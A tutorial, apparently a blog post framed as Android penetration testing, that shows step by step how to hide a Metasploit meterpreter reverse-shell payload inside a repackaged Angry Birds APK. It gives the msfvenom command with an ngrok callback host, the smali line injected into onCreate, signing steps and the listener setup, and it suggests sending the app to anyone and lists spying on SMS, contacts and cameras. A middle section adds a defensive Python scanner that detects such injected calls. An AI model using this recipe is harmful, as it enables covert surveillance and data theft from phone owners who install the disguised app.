It is possible to use a normal Android application as a payload in order to exploit any device. This test is important in every Android security assessment, as it allows the penetration tester to discover whether the binary has protections in place against this kind of tampering.
In this process, we are going to manually inject the payload into an Android application using these tools:
NGrok
MSFVENOM
Metasploit
Apktool
Keytool
Jarsigner
Zipalign
The first step is to download an APK file from apkmirror.com. I picked the Angry Birds game and downloaded the APK to my computer so we can inject the payload into it.

Next, we start ngrok to set up port forwarding, so the payload can reach us from anywhere and not just from the local network:
./ngrok tcp 4444

Then we create the payload with msfvenom, using the address and port that ngrok assigned:
msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=15827 R > fakebirds.apk

Now we should have two files in the same directory, the payload we created and the normal APK file:

Use the apktool command to decode both APKs:

Now, inside the fakebirds folder, navigate to fakebirds/smali/com and copy the Metasploit file to the other folder, the angrybirds folder:

Now go back to the fakebirds folder, open the file AndroidManifest.xml, and also open the same file from the angrybirds folder. Copy the highlighted part from the fakebirds file to the angrybirds file, the part which contains the user permissions:

Now the angrybirds file should look something like this:

Inside the AndroidManifest.xml of the angrybirds folder (the real one), look for the line below. This line is very important, as it names the first code that is executed when we run the application:

Where it says android:name="com.unity3d.player.UnityPlayerActivity", that is the activity we need to locate and modify. The path to it is /angrybirds/smali_classes2/com/unity3d/player; open the file UnityPlayerActivity.smali there.
Inside the file, search for "onCr" to find the onCreate method:

Directly under that line, paste the following line:
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

Save it and close the file.
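From the defender's side, the edit above leaves a recognisable trace in the decompiled code: an invoke-static call from onCreate into a package the application does not own. The following Python script is an added example (not part of the original post) that scans a smali file for exactly that trace; the sample smali fragment and the com/example/dropper class name in it are constructed for the demonstration.

```python
import re
from dataclasses import dataclass

# Constructed sample: a fragment of the kind of smali file the post edits,
# with an injected stager call placed directly under onCreate's super call.
# The com/example/dropper line is a second, made-up foreign call.
SAMPLE_SMALI = """\
.class public Lcom/unity3d/player/UnityPlayerActivity;
.super Landroid/app/Activity;

.method protected onCreate(Landroid/os/Bundle;)V
    .locals 1
    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
    invoke-static {p0}, Lcom/example/dropper/Loader;->run(Landroid/content/Context;)V
    invoke-static {p0}, Lcom/unity3d/player/UnityPlayer;->init(Landroid/content/Context;)V
    return-void
.end method
"""

# Class prefix of the stager the post injects; extend with other known stagers.
KNOWN_STAGER_CLASSES = ("Lcom/metasploit/stage/",)

@dataclass
class Finding:
    method: str      # smali method the call was found in
    target: str      # fully qualified callee, e.g. Lcom/x/Y;->start(...)V
    reason: str

def _package(class_desc: str) -> str:
    # 'Lcom/unity3d/player/UnityPlayerActivity;' -> 'com/unity3d/player'
    return class_desc.strip("L;").rsplit("/", 1)[0]

def scan_smali(text: str) -> list[Finding]:
    """Flag calls into known stager classes anywhere in the file, and invoke-static
    calls from onCreate whose target leaves the app's own top-level package."""
    own_pkg = _package(re.search(r"^\.class\s+(?:\w+\s+)*(L[^;]+;)", text, re.M).group(1))
    findings, current = [], None
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith(".method"):
            current = line.split()[-1]          # e.g. onCreate(Landroid/os/Bundle;)V
        elif line.startswith(".end method"):
            current = None
        m = re.match(r"invoke-static\s+\{[^}]*\},\s*(L[^;]+;)->(\S+)", line)
        if not m:
            continue
        cls, target = m.group(1), m.group(1) + "->" + m.group(2)
        if cls.startswith(KNOWN_STAGER_CLASSES):
            findings.append(Finding(current, target, "known stager class"))
        elif current and current.startswith("onCreate(") and \
                _package(cls).split("/")[:2] != own_pkg.split("/")[:2]:
            findings.append(Finding(current, target, "foreign package called from onCreate"))
    return findings

if __name__ == "__main__":
    for f in scan_smali(SAMPLE_SMALI):
        print(f"{f.reason}: {f.target} in {f.method}")
```

Run it over every .smali file produced by apktool d; a clean build of the original app should produce no findings, so any hit is worth a manual look.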
Next, we are going to create a keystore file to hold the key we will use to sign the APK file:
keytool -genkey -keystore (path to the keystore file) -alias (any name) -keyalg RSA -keysize 2048 -validity 1000

After creating the keystore, we are going to use apktool again, this time to rebuild the APK file, and after that we sign it:
apktool b angrybirds

Take a look at the path /root/Downloads/angrybirds/dist/, where the new APK file is created:

Now sign the APK with this command:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore /root/key.keystore /root/Downloads/angrybirds/dist/angrybirds.apk hacker
You should see something like this message:

The final step is to use zipalign to align the archive and produce the final APK file, which is the payload:
zipalign -v 4 /root/Downloads/angrybirds/dist/angrybirds.apk AngryBirds2.apk

And success.

Now copy this APK to the phone you want to test or upload it to some webpage or send it to anyone.
But one last step is to start a listener with msfconsole:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit

Now as soon as the APK file is installed and opened, you will get a session back to your machine:

As we can see, the APK file looks like a legitimate file, with the original icon and size, and it installs without any problem or security warnings:

The game started normally with no problems at all, and we got a reverse shell back to our machine:

Type help and you will see a long list of commands to choose from. From here you can control the phone: dump SMS, contacts and call logs, start any application on the phone, and even take a photo with the back or front camera.